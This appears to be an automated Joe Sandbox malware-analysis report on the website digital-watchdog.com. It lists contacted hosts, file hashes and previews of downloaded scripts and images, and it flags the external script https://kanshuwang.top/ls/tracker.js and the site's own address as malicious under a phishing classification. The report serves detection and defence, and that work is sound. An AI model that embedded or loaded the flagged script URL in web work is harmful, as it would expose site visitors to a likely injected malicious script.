                                                                                                                          unknown
                                                                                                                          https://kanshuwang.top/ls/tracker.jstrue
                                                                                                                            unknown
                                                                                                                            https://digital-watchdog.com/product_detail_assets/top_nav_icon5.jpgfalse
                                                                                                                              unknown
                                                                                                                              https://digital-watchdog.com/js/auto-suggest-pages.js?20250530073516false
                                                                                                                                unknown
                                                                                                                                https://digital-watchdog.com/library/select2/js/select2.min.jsfalse
                                                                                                                                  unknown
                                                                                                                                  https://digital-watchdog.com/favicon.icofalse
                                                                                                                                    unknown
                                                                                                                                    https://digital-watchdog.com/css/bootstrap-datepicker.css?20250530073516false
                                                                                                                                      unknown
                                                                                                                                      https://digital-watchdog.com/product_detail_assets/top_nav_icon3.jpgfalse
                                                                                                                                        unknown
                                                                                                                                        https://digital-watchdog.com/product_detail_assets/ig_icon_orange.pngfalse
                                                                                                                                          unknown
                                                                                                                                          https://digital-watchdog.com/product_detail_assets/linkedin_icon_orange.pngfalse
                                                                                                                                            unknown
                                                                                                                                            https://digital-watchdog.com/js/auto-suggest.js?20250530073516false
                                                                                                                                              unknown
                                                                                                                                              https://digital-watchdog.com/js/jquery.maskedinput.min.js?20250530073516false
                                                                                                                                                unknown
                                                                                                                                                https://digital-watchdog.com/js/jqBootstrapValidation.js?20250530073516false
                                                                                                                                                  unknown
                                                                                                                                                  https://digital-watchdog.com/js/script.js?20250530073516false
                                                                                                                                                    unknown
                                                                                                                                                    https://digital-watchdog.com/product_detail_assets/X_icon.pngfalse
                                                                                                                                                      unknown
                                                                                                                                                      https://digital-watchdog.com/library/jquery-toast/dist/toastr.min.js?20250530073516false
                                                                                                                                                        unknown
                                                                                                                                                        https://k.clarity.ms/collectfalse
                                                                                                                                                          high
                                                                                                                                                          https://digital-watchdog.com/library/Cookie-Alert/cookiealert.css?20250530073516false
                                                                                                                                                            unknown
                                                                                                                                                            https://digital-watchdog.com/css/custom-style.css?20250530073516false
                                                                                                                                                              unknown
                                                                                                                                                              https://digital-watchdog.com/library/select2/css/select2.min.cssfalse
                                                                                                                                                                unknown
                                                                                                                                                                https://digital-watchdog.com/product_detail_assets/top_nav_icon4.jpgfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  https://digital-watchdog.com/library/jquery-toast/dist/toastr.min.css?20250530073516false
                                                                                                                                                                    unknown
                                                                                                                                                                    https://digital-watchdog.com/css/new-homepage.cssfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      https://digital-watchdog.com/assets/Inventory_Clearance_Banner.pngfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        https://digital-watchdog.com/tinymce/tinymce.min.js?20250530073516false
                                                                                                                                                                          unknown
                                                                                                                                                                          https://digital-watchdog.com/false
                                                                                                                                                                            unknown
                                                                                                                                                                            https://digital-watchdog.com/models/webstat.phpfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              https://digital-watchdog.com/css/framework.cssfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                https://digital-watchdog.com/js/xdate.jsfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://digital-watchdog.com/admin/assets/_medialibrary/20250414151519dp875346491.pngfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                    • 75% < No. of IPs
                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                    142.250.114.156
                                                                                                                                                                                    td.doubleclick.netUnited States15169GOOGLEUSfalse
                                                                                                                                                                                    104.18.10.207
                                                                                                                                                                                    stackpath.bootstrapcdn.comUnited States13335CLOUDFLARENETUSfalse
                                                                                                                                                                                    57.144.194.1
                                                                                                                                                                                    unknownBelgium2686ATGS-MMD-ASUSfalse
                                                                                                                                                                                    151.101.193.229
                                                                                                                                                                                    jsdelivr.map.fastly.netUnited States54113FASTLYUSfalse
                                                                                                                                                                                    142.251.116.102
                                                                                                                                                                                    unknownUnited States15169GOOGLEUSfalse
                                                                                                                                                                                    142.251.116.97
                                                                                                                                                                                    unknownUnited States15169GOOGLEUSfalse
                                                                                                                                                                                    104.18.0.22
                                                                                                                                                                                    unpkg.comUnited States13335CLOUDFLARENETUSfalse
                                                                                                                                                                                    142.251.116.94
                                                                                                                                                                                    beacons6.gvt2.comUnited States15169GOOGLEUSfalse
                                                                                                                                                                                    54.151.32.244
                                                                                                                                                                                    digital-watchdog.comUnited States16509AMAZON-02UStrue
                                                                                                                                                                                    173.194.208.103
                                                                                                                                                                                    www.google.comUnited States15169GOOGLEUSfalse
                                                                                                                                                                                    20.125.209.212
                                                                                                                                                                                    c-msn-pme.trafficmanager.netUnited States8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                    142.250.113.139
                                                                                                                                                                                    unknownUnited States15169GOOGLEUSfalse
                                                                                                                                                                                    108.156.245.9
                                                                                                                                                                                    publickeyservice.pa-3.aws.privacysandboxservices.comUnited States16509AMAZON-02USfalse
                                                                                                                                                                                    142.250.115.101
                                                                                                                                                                                    unknownUnited States15169GOOGLEUSfalse
                                                                                                                                                                                    150.171.28.10
                                                                                                                                                                                    ax-0001.ax-msedge.netUnited States8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                    151.101.66.137
                                                                                                                                                                                    code.jquery.comUnited States54113FASTLYUSfalse
                                                                                                                                                                                    142.251.186.157
                                                                                                                                                                                    googleads.g.doubleclick.netUnited States15169GOOGLEUSfalse
                                                                                                                                                                                    3.167.237.66
                                                                                                                                                                                    dmq883log67hn.cloudfront.netUnited States16509AMAZON-02USfalse
                                                                                                                                                                                    142.251.186.94
                                                                                                                                                                                    unknownUnited States15169GOOGLEUSfalse
                                                                                                                                                                                    57.144.194.128
                                                                                                                                                                                    scontent.xx.fbcdn.netBelgium2686ATGS-MMD-ASUSfalse
                                                                                                                                                                                    142.251.186.97
                                                                                                                                                                                    unknownUnited States15169GOOGLEUSfalse
                                                                                                                                                                                    34.54.30.30
                                                                                                                                                                                    publickeyservice-a.pa-3.gcp.privacysandboxservices.comUnited States2686ATGS-MMD-ASUSfalse
                                                                                                                                                                                    142.250.189.4
                                                                                                                                                                                    unknownUnited States15169GOOGLEUSfalse
                                                                                                                                                                                    31.13.93.35
                                                                                                                                                                                    star-mini.c10r.facebook.comIreland32934FACEBOOKUSfalse
                                                                                                                                                                                    1.1.1.1
                                                                                                                                                                                    unknownAustralia13335CLOUDFLARENETUSfalse
                                                                                                                                                                                    3.167.237.109
                                                                                                                                                                                    unknownUnited States16509AMAZON-02USfalse
                                                                                                                                                                                    13.107.246.57
                                                                                                                                                                                    s-part-0029.t-0009.t-msedge.netUnited States8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                    172.175.38.6
                                                                                                                                                                                    vmss-clarity-ingest-eus2-e.eastus2.cloudapp.azure.comUnited States7018ATT-INTERNET4USfalse
                                                                                                                                                                                    173.194.208.154
                                                                                                                                                                                    stats.g.doubleclick.netUnited States15169GOOGLEUSfalse
                                                                                                                                                                                    142.250.113.94
                                                                                                                                                                                    unknownUnited States15169GOOGLEUSfalse
                                                                                                                                                                                    142.250.115.95
                                                                                                                                                                                    unknownUnited States15169GOOGLEUSfalse
                                                                                                                                                                                    142.250.114.100
                                                                                                                                                                                    analytics.google.comUnited States15169GOOGLEUSfalse
                                                                                                                                                                                    142.250.115.113
                                                                                                                                                                                    unknownUnited States15169GOOGLEUSfalse
                                                                                                                                                                                    104.21.27.152
                                                                                                                                                                                    use.fontawesome.com.cdn.cloudflare.netUnited States13335CLOUDFLARENETUSfalse
                                                                                                                                                                                    142.250.115.138
                                                                                                                                                                                    unknownUnited States15169GOOGLEUSfalse
                                                                                                                                                                                    79.141.162.37
                                                                                                                                                                                    kanshuwang.topBulgaria202015HZ-US-ASBGfalse
                                                                                                                                                                                    52.146.86.174
                                                                                                                                                                                    v3-use-appgwv2.eastus.cloudapp.azure.comUnited States8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                    142.250.113.105
                                                                                                                                                                                    unknownUnited States15169GOOGLEUSfalse
                                                                                                                                                                                    142.251.186.84
                                                                                                                                                                                    unknownUnited States15169GOOGLEUSfalse
                                                                                                                                                                                    173.194.208.94
                                                                                                                                                                                    unknownUnited States15169GOOGLEUSfalse
                                                                                                                                                                                    104.17.25.14
                                                                                                                                                                                    cdnjs.cloudflare.comUnited States13335CLOUDFLARENETUSfalse
                                                                                                                                                                                    IP
                                                                                                                                                                                    192.168.2.16
                                                                                                                                                                                    192.168.2.4
                                                                                                                                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                    Analysis ID:1702450
                                                                                                                                                                                    Start date and time:2025-05-30 16:34:39 +02:00
                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                    Overall analysis duration:
                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                    Report type:full
                                                                                                                                                                                    Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                                                                    Sample URL:http://digital-watchdog.com
                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                    Number of analysed new started processes analysed:18
                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                    Technologies:
                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                    Analysis Mode:stream
                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                    Classification:mal64.phis.win@28/107@94/443
                                                                                                                                                                                    • Exclude process from analysis (whitelisted): svchost.exe
                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 142.251.116.102, 142.251.116.100, 142.251.116.113, 142.251.116.138, 142.251.116.139, 142.251.116.101, 142.250.113.94, 142.250.115.101, 142.250.115.139, 142.250.115.138, 142.250.115.100, 142.250.115.102, 142.250.115.113, 142.251.186.84, 173.194.208.100, 173.194.208.138, 173.194.208.139, 173.194.208.101, 173.194.208.102, 173.194.208.113, 142.251.186.100, 142.251.186.113, 142.251.186.139, 142.251.186.138, 142.251.186.102, 142.251.186.101, 142.251.116.97, 142.250.115.95
                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): fonts.googleapis.com, clients2.google.com, accounts.google.com, redirector.gvt1.com, www.googletagmanager.com, clientservices.googleapis.com, clients.l.google.com
                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                    • VT rate limit hit for: kanshuwang.top
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1565
                                                                                                                                                                                    Entropy (8bit):5.110299732205675
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:62F61337927811D6CE307E904F6A60D9
                                                                                                                                                                                    SHA1:F6BEFDB265EE14B2770EE047E84EE0F61DAE76DE
                                                                                                                                                                                    SHA-256:4014D6FC9CB22BE3D34A709B03BDEFD227AEDBD9767DD07166CC40812D764230
                                                                                                                                                                                    SHA-512:C2DF6A78E194D336AE0FB404A2B6E9FD11427ECB714E7DBE6975514FB059F595FE619001BA01DEA52E44BA737C543A90ECB164B8D251985853613E6752AC9B3D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://digital-watchdog.com/js/auto-suggest-pages.js?20250530073516
                                                                                                                                                                                    Preview:..$(document).ready(function(e) { ...// Auto Search Options:...var globalSearchInput = $('#page_auto_suggest .page_global_search'),....globalSearchSuggestion = $('#page_auto_suggest .product_search_suggestion'),....globalSearchValue = '',....globalSearchTimeout;.....globalSearchInput.keyup(function(e){....if(e.which==13){.....e.preventDefault();.....let val = $(e.target).val().trim();.....if(val!=''){......let url = location.protocol+'//'+location.host+'/search-result/?keywords='+val;......window.location.href = url;.....}....}else{.....globalSearchValue = globalSearchInput.val();.....if(globalSearchValue=='') globalSearchSuggestion.html('');.....else searhSuggest(globalSearchValue);....}...});...$('#page_auto_suggest .i-global-search').click(function(e){....e.preventDefault();....let val = globalSearchInput.val().trim();....if(val!=''){.....let url = location.protocol+'//'+location.host+'/search-result/?keywords='+val;.....window.location.href = url;....}...});.....function searhSug
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (4112), with CRLF line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):4330
                                                                                                                                                                                    Entropy (8bit):5.361372836701116
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:C6DF8E890079A5BF367653CE7A4A181D
                                                                                                                                                                                    SHA1:81DD20E943C855B794360CF74F3BFB1EAC0AA3DE
                                                                                                                                                                                    SHA-256:58C5FB14D40E03A30B242153B35222EF2C66912229FE98E3BAD88AFD8BB4AA37
                                                                                                                                                                                    SHA-512:69B6292EF98E51F74102E9B4C82438D0F17438CCA34CC11EB0D385B71480D149B513791F0238CCA3E6B762ACDDCE8EE7A76B5E59A70D6647AAC736C7E7EA758F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://digital-watchdog.com/js/jquery.maskedinput.min.js?20250530073516
                                                                                                                                                                                    Preview:/*.. jQuery Masked Input Plugin.. Copyright (c) 2007 - 2015 Josh Bush (digitalbush.com).. Licensed under the MIT license (http://digitalbush.com/projects/masked-input-plugin/#license).. Version: 1.4.1..*/..!function(a){"function"==typeof define&&define.amd?define(["jquery"],a):a("object"==typeof exports?require("jquery"):jQuery)}(function(a){var b,c=navigator.userAgent,d=/iphone/i.test(c),e=/chrome/i.test(c),f=/android/i.test(c);a.mask={definitions:{9:"[0-9]",a:"[A-Za-z]","*":"[A-Za-z0-9]"},autoclear:!0,dataName:"rawMaskFn",placeholder:"_"},a.fn.extend({caret:function(a,b){var c;if(0!==this.length&&!this.is(":hidden"))return"number"==typeof a?(b="number"==typeof b?b:a,this.each(function(){this.setSelectionRange?this.setSelectionRange(a,b):this.createTextRange&&(c=this.createTextRange(),c.collapse(!0),c.moveEnd("character",b),c.moveStart("character",a),c.select())})):(this[0].setSelectionRange?(a=this[0].selectionStart,b=this[0].selectionEnd):document.selection&&document.sel
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=19, height=3744, bps=242, PhotometricIntepretation=RGB, manufacturer=Canon, model=Canon EOS 5D Mark II, orientation=upper-left, width=5616], progressive, precision 8, 2000x1657, components 3
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1672509
                                                                                                                                                                                    Entropy (8bit):7.986144877178177
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:8836C2113B3C5DA2BE88E73AE0DA184E
                                                                                                                                                                                    SHA1:D22BC785ED1B6C4AA1B5AD640A05C85BA50940D2
                                                                                                                                                                                    SHA-256:B7A5B10EFEA930D04F836CEF45E095D67FDA0314F084BF9132C18E61511C60A9
                                                                                                                                                                                    SHA-512:E645F7A27B5230C6E5C66A046DF2AC0D4D2D5A684BA7E08FF1912BB8B7F90D8BBBD7F4EC0C5B1DA185C5D960F5360D76B9001C1DD0311F62B3E2ED899E1F99DE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://dmq883log67hn.cloudfront.net/assets/_medialibrary/20220907225015dp254308958.jpg
                                                                                                                                                                                    Preview:....(MExif..II*...............................................................................................................................(...........1...!...#...2.......D...>.......X...?.......h...........................i...........%.....................Canon.Canon EOS 5D Mark II...-..'....-..'..Adobe Photoshop 23.4 (Macintosh).2022:09:07 22:19:19.9.......I.......@...d...!...d.......d...G...d.......d.......d...+.......K.......r....... .........6...........>..."...........'...................0221........F...........Z.......................n...........v...........~.......................................................................97..........97..........97..........0100................................y.......................................................................................................................(...8.......2016:05:04 15:39:10.2016:05:04 15:39:10..`............................................................................................................
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:assembler source, ASCII text, with CRLF line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):14249
                                                                                                                                                                                    Entropy (8bit):5.16477898334664
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:E2AFA71710DDB44C364461FA201D63E6
                                                                                                                                                                                    SHA1:EB23CFEF6045AB7AE047B1E2730513419EE48F1A
                                                                                                                                                                                    SHA-256:CF475342BBDFFC83F89E91103195181E887FDD582F2BE534039A3A008C693D35
                                                                                                                                                                                    SHA-512:F39B681F5F2D76451958CBBEC3DE369E19119022424805FADB9A3D04C84D56BE9AD644E9D3E65F9749F0EAD9F99684DF9B6C69C403F92849E8CCD11B65128AC2
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://digital-watchdog.com/js/bootstrap-datepicker.js?20250530073516
                                                                                                                                                                                    Preview:/* =========================================================.. * bootstrap-datepicker.js .. * http://www.eyecon.ro/bootstrap-datepicker.. * =========================================================.. * Copyright 2012 Stefan Petre.. *.. * Licensed under the Apache License, Version 2.0 (the "License");.. * you may not use this file except in compliance with the License... * You may obtain a copy of the License at.. *.. * http://www.apache.org/licenses/LICENSE-2.0.. *.. * Unless required by applicable law or agreed to in writing, software.. * distributed under the License is distributed on an "AS IS" BASIS,.. * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied... * See the License for the specific language governing permissions and.. * limitations under the License... * ========================================================= */.. ..!function( $ ) {......// Picker object......var Datepicker = function(element, options){....this.element = $(element);....this.format =
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):514
                                                                                                                                                                                    Entropy (8bit):5.180571332231197
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:4EA257E74BFAAC6F75AE6F46CE64F100
                                                                                                                                                                                    SHA1:6685D0E058BAC5F41A97D13EF22E6701B5926E57
                                                                                                                                                                                    SHA-256:F3ADC2264F6FE5F61BEFC0002BCAAC78A63C0F83591DA90317F5EC8D2B79DF1A
                                                                                                                                                                                    SHA-512:0D68571F3C78C9DF09E6D3DFFB32BA5FA94A30354F0FFC3C8B8A96127D2E73BFEAE1A8D8D185F76C3F922153A68CDF3B2B569B9BFEB1436D83F4A4A554ABC161
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://publickeyservice.pa.aws.privacysandboxservices.com/.well-known/protected-auction/v1/public-keys
                                                                                                                                                                                    Preview:{. "keys": [{. "id": "1080000000000000",. "key": "WHGJQ6kUlWWFRjMjHDmXcZOQtUxyaxb8bLFrGarGXlA\u003d". }, {. "id": "2080000000000000",. "key": "cOQinRt8YoDGsZmrCYOkOtkbQQJ+lI+Q0Fvk2dFb9zA\u003d". }, {. "id": "6080000000000000",. "key": "qCKKTXfh/oQ1Sf8dTC0DK1z45/FJCEK8UkfAVpO71wo\u003d". }, {. "id": "A080000000000000",. "key": "sHIWBdkm7OI7No2WI1QFVB7gtWn0wmkyddCxFwtKlzg\u003d". }, {. "id": "E080000000000000",. "key": "1LO/5jKpqiWMPnw8pgSnYqVeI/Gt0CMOx2u8NhoHfFY\u003d". }].}
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):3370
                                                                                                                                                                                    Entropy (8bit):7.935488646453699
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:F97562BDB06082138BE49A5E07A3F6D5
                                                                                                                                                                                    SHA1:C3E357D89227B07EBBE0C386461F8C1AF8791A5D
                                                                                                                                                                                    SHA-256:F620CA9DF7E5A6AD2FD527F4ADF74AC647BC3BA2A4A754FEC9B5DA94FC0804F4
                                                                                                                                                                                    SHA-512:5733D40F953F4BF96AAA8418AC9F68D4E808421D85EFCF9D89096D1642A1B9C8B4C3430D103352BF572625CE4E7F54827038DA541DFEE90FAAA28CDC58637730
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://cdn.jsdelivr.net/gh/fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css
                                                                                                                                                                                    Preview:....7...tU.'...H..$2...z.u.ey...=<Y..8Q.....t....f.L..DU..K........TS.(0@`..R.t!..\..]......*lQ.......F..QV....e(..O...U..e^{.kV.YO.f..,.>.....}7S."...r.I.)..FHGxb.]x...E.if..{.E....cEZV6.s.43..=.")..E.8......e. -..b.....1..3.......C4..x<b...i$G.6+Y...y...<.C.p.&.#L.3L(...T.V.48..!.....#R.f*h......J..hYYN..d8....z|OR...O+a.....<...S...5.|.C....._gU./...].$o.....h.....1....b.,&9..i\..{.{L.{......c`..Q.r$....Cb}VQA..0.WX.H.f./.$..7.o.y.q9F....vo.o..5.!.D.6.p...{".s.......c....Mo...L..E.g.9.#Mr...tn.[......MW.=.....@.F..L.x^.m....r.... 2..>..0...=<i. .....$...s..b..8..`..,....@.X..P..A|.P_dG....^s.D....1M]..........@..LD.m.cj..,m...z..U;.o.J.0&..=M.0..2...}.......+...}.T.I.L..2Z.v..by.G.5...&...<E....[.h,.3&.....%..%..e..<c..D..N......m.......3..Ift8.....G..\._.. ..K.{.5...v..z.;.34..r.Q.=T..Y...~i......B.+K;)7....>..nc.. ....Kp.x3.gL...@..Q.Z.V........&4>....v....q...)xF.../R..K....[5.<.=11M.&.b#k.b.<e^t#.....k?D.iO.=.l.||9&|R..<`...mD.....
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:PNG image data, 883 x 676, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):421779
                                                                                                                                                                                    Entropy (8bit):7.994521802828602
                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:F62E78141D8AD6469ACF665CE8F63C76
                                                                                                                                                                                    SHA1:5B5DD67FF8A502D276B887BCB129CF994BB8BBBE
                                                                                                                                                                                    SHA-256:47DF32F3A65F72DD41CCD650A99932693FE598F3A62412767F182E05D99001A5
                                                                                                                                                                                    SHA-512:AD0EA190986DD6C55C8037EF9B680DDA40D59FB811D29056FABF09D88690544B9ED7917EC2C8F7337C47469AE209874D458FF07E1179E490222983C997DC028C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://dmq883log67hn.cloudfront.net/assets/_medialibrary/20240926103313dp2042930829.png
                                                                                                                                                                                    Preview:.PNG........IHDR...s...........fY....gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=676, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=883], baseline, precision 8, 883x676, components 3
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):195883
                                                                                                                                                                                    Entropy (8bit):7.488725762969001
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:1A50E8E8759D77CDAD33CBF06BFEBD31
                                                                                                                                                                                    SHA1:C6D7696B2A7228FBC4E9AA6E53B8AF46045CEB9C
                                                                                                                                                                                    SHA-256:853740D023657D9D62BED0EC902B35F1A005BEF8AD790819472D669455DDD8EA
                                                                                                                                                                                    SHA-512:A157BC6FCEAF9F86388EFA2ACD234FB865C9D32E824B930BA26842610113AD0990CD28E80FFF4169539FAF5574FF86007DFC3C6BCBB5930DE676FC7AA7CC4ADA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://dmq883log67hn.cloudfront.net/assets/_medialibrary/20220708113233dp1880617416.jpg
                                                                                                                                                                                    Preview:.....#Exif..MM.*...............s.......................................................................................(...........1...........2..........i............. ............'.......'.Adobe Photoshop 22.0 (Windows).2022:07:08 13:13:37............0231.......................s...........................................n...........v.(.....................~...................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................z...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..Bt..R.t..R..'IJN.I)t..'L.%..I$..N..I2tT.p.8IO...S.N.....R..'IK..I)t..'L.%
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1978
                                                                                                                                                                                    Entropy (8bit):7.9096173644397565
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:
                                                                                                                                                                                    MD5:504FBF2871FB040D86A50D4CAC6E02CF
                                                                                                                                                                                    SHA1:5BF8C611C1F73F3B45163AB31546291E55A38CC8
                                                                                                                                                                                    SHA-256:7D689838FED6234258C841CC976F669E9741A581444C25B5249FEA6302F8B989
                                                                                                                                                                                    SHA-512:AD7AA62842B90158FB3DF9DA6DA972CC837223B9FFB3B01EB4C2C15B2C0A55FF7FBB94367CA90E8AA27186AEAEB796B95137789B51A561D99F6281CA1FD79EAA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                    URL:https://googleads.g.doubleclick.net/pagead/viewthroughconversion/456244667/?random=1748615717986&cv=11&fst=1748615717986&bg=ffffff&guid=ON&async=1&gtm=45be55s2v899007962za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101509157~103116026~103130498~103130500~103200004~103233427~103252644~103252646~103351869~103351871~104481633~104481635~104559073~104559075&ptag_exp=101509157~103116026~103130498~103130500~103200004~103233427~103252644~103252646~103351869~103351871~104481633~104481635~104559073~104559075&u_w=1280&u_h=1024&url=https%3A%2F%2Fdigital-watchdog.com%2F&hn=www.googleadservices.com&frm=0&tiba=Digital%20Watchdog%20l%20Welcome&npa=0&pscdl=noapi&auid=2004574435.1748615718&uaa=x86&uab=64&uafvl=Chromium%3B134.0.6998.36%7CNot%253AA-Brand%3B24.0.0.0%7CGoogle%2520Chrome%3B134.0.6998.36&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=4
